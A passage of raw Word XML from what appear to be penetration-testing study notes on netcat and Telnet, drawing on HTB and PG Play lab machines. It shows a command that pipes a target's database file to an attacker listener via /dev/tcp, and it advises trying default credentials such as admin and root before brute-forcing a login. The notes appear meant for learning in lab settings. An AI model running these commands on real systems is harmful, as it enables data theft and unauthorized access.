          <w:numId w:val="934"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You have to add the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-u </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000121C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000121D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-lvnp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000121E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="992"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-l </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Listen mode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000121F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="992"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-v </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Verbose.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001220">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="992"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Numeric-only IPs (no DNS resolution).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001221">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="992"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p &lt;port&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Port number.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001222">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001223">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use netcat to transfer files. More specifically, we use cat to read the file and "write" its contents to a local file using netcat. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001224">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001225">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, if we find a database (in our example, it's a sqlite3 .db file from Codify HTB), we did this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001226">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On your local machine: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lnvp 2222 &gt; tickets.db</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001227">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the target machine (where tickets.db located): </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001228">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat tickets.db &gt; /dev/tcp/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/2222</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001229">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then in our example, we can now interact with tickets.db locally:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000122A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlite3 tickets.db</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000122B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1459"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Trying running "strings" on it or use sqlite or use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install sqlitebrowser</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to view it using GUI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000122C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000122D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000122E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000122F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, when you open a website and the output doesn't seem correct or you get an error message, try connecting via netcat instead of firefox. This is seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId350">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Djinn3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001230">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3338513" cy="1110607"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="568" name="image543.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image543.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId351"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3338513" cy="1110607"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001231">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1412"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We get this weird error message even though it never prompts us for username and password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001232">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3633788" cy="1004168"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="577" name="image560.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image560.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId352"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3633788" cy="1004168"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001233">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1254"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So we connect via netcat which allows us to finally put in username and password </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001234">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001235">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012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37">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001238">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7w65w3ow6inh" w:id="150"/>
      <w:bookmarkEnd w:id="150"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001239">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000123A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When blindly trying stuff, try these commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000123B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1106"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000123C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1106"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">help</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000123D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1106"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">menu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000123E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1106"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000123F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1106"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001240">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001241">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Telnet can be confusing because it can be seen in two different ways:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001242">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001243">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1500"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Telnet as a service (on port 23)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1500"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Telnet is open on port 23, and when you see that, you can connect to it using the command: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">telnet [IP] [port number]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001245">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1500"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you connect, it will prompt you for a login, maybe it will take a few seconds though</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1500"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then you can try and brute force login, but try some common default credential first:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001247">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1500"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin, root, user, guest, anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001248">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1500"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Telnet as a Tool (Command-Line Application)</w:t>
      </w:r>
    </w:p>
